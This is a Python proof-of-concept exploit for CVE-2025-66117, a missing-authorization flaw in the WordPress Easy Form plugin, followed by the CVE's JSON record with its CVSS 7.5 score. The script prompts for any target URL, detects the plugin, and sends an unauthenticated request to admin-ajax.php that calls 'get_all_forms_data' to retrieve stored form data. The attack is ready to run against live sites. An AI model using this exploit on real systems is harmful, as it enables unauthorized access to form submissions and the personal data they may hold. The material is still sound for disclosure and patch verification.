CVE-2025-66117

# CVE-2025-66117 PoC - WordPress Easy Form Broken Access Control # This PoC demonstrates the authorization bypass in Easy Form plugin import requests import sys target = input("Enter target URL: ").rstrip('/') # Check if the plugin is installed plugin_check_url = f"{target}/wp-content/plugins/easy-form/readme.txt" try: response = requests.get(plugin_check_url, timeout=10) if 'Easy Form' not in response.text: print("[-] Easy Form plugin not detected") sys.exit(0) print("[+] Easy Form plugin detected") except: print("[-] Failed to connect to target") sys.exit(0) # Exploit the missing authorization vulnerability # Try to access admin functionality without authentication payload = { 'action': 'ays_easy_form_ajax', 'function': 'get_all_forms_data', # No nonce or authentication required due to missing authorization check } print("[*] Sending exploit request...") try: response = requests.post( f"{target}/wp-admin/admin-ajax.php", data=payload, timeout=10, verify=False ) if response.status_code == 200: print(f"[+] Request successful - Status: {response.status_code}") print(f"[+] Response preview: {response.text[:500]}") # Check if sensitive data is returned if 'form' in response.text.lower() or 'data' in response.text.lower(): print("[!] VULNERABLE - Unauthorized access to form data possible") else: print("[*] Response received but may require further analysis") else: print(f"[-] Request failed - Status: {response.status_code}") except Exception as e: print(f"[-] Error: {str(e)}") print("\n[*] Manual verification steps:") print("1. Check if form submissions can be accessed without authentication") print("2. Verify if admin functions are accessible via unauthenticated requests") print("3. Test access to export/import functionality")

{"cve": {"id": "CVE-2025-66117", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:16.310", "lastModified": "2026-04-27T18:16:36.870", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ays Pro Easy Form easy-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Form: from n/a through <= 2.7.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-form/vulnerability/wordpress-easy-form-plugin-2-7-8-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}